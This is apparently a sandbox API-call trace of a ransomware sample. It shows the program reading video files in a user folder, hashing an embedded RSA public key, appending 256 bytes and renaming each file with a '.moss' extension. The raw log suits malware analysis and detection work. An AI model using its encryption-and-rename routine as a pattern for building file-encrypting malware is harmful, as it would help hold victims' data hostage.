1 [0172.540] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.540] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x18d53, lpOverlapped=0x0) returned 1 [0172.540] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.540] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.540] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.540] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.541] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.541] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.541] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.541] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.541] GetLastError () returned 0x0 [0172.542] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.542] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.542] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.542] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.542] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.542] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.543] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18d53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.543] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.543] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\hEFla2O9Gdxlhd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\hefla2o9gdxlhd.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\hEFla2O9Gdxlhd.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\hefla2o9gdxlhd.swf.moss")) returned 1 [0172.544] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\lqRBBYuMkoOsPz_.avi") returned=".avi" [0172.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\lqRBBYuMkoOsPz_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\lqrbbyumkoospz_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.544] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1413) returned 1 [0172.545] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.547] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x55f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.547] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.548] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x585, lpOverlapped=0x0) returned 1 [0172.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.548] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.549] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.549] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.549] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.549] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.549] GetLastError () returned 0x0 [0172.549] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.549] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.549] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.549] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.549] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.549] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b44498 [0172.550] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x585, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.550] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.550] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\lqRBBYuMkoOsPz_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\lqrbbyumkoospz_.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\lqRBBYuMkoOsPz_.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\lqrbbyumkoospz_.avi.moss")) returned 1 [0172.551] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\oAjt_lfb.avi") returned=".avi" [0172.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\oAjt_lfb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\oajt_lfb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.551] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=48426) returned 1 [0172.551] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.554] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xbd04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.554] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.555] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xbd2a, lpOverlapped=0x0) returned 1 [0172.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.556] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.556] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.556] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.556] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.556] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.556] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.556] GetLastError () returned 0x0 [0172.557] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.557] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.557] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.557] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.557] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.557] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.557] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xbd2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.557] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.558] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\oAjt_lfb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\oajt_lfb.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\oAjt_lfb.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\oajt_lfb.avi.moss")) returned 1 [0172.559] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\UYbsuYquLTF3oeW.flv") returned=".flv" [0172.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\O8XDzJfnVQ\\UYbsuYquLTF3oeW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\o8xdzjfnvq\\uybsuyqultf3oew.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.559] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=78821) returned 1 [0172.560] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.562] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x133bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.563] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.564] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x133e5, lpOverlapped=0x0) returned 1 [0172.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.565] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.565] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.565] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.566] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.566] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.566] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.566] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.566] GetLastError () returned 0x0 [0172.566] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.566] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.566] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.566] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.566] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.567] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.567] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.567] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x133e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.567] WriteFile (in: hFile=0x664, 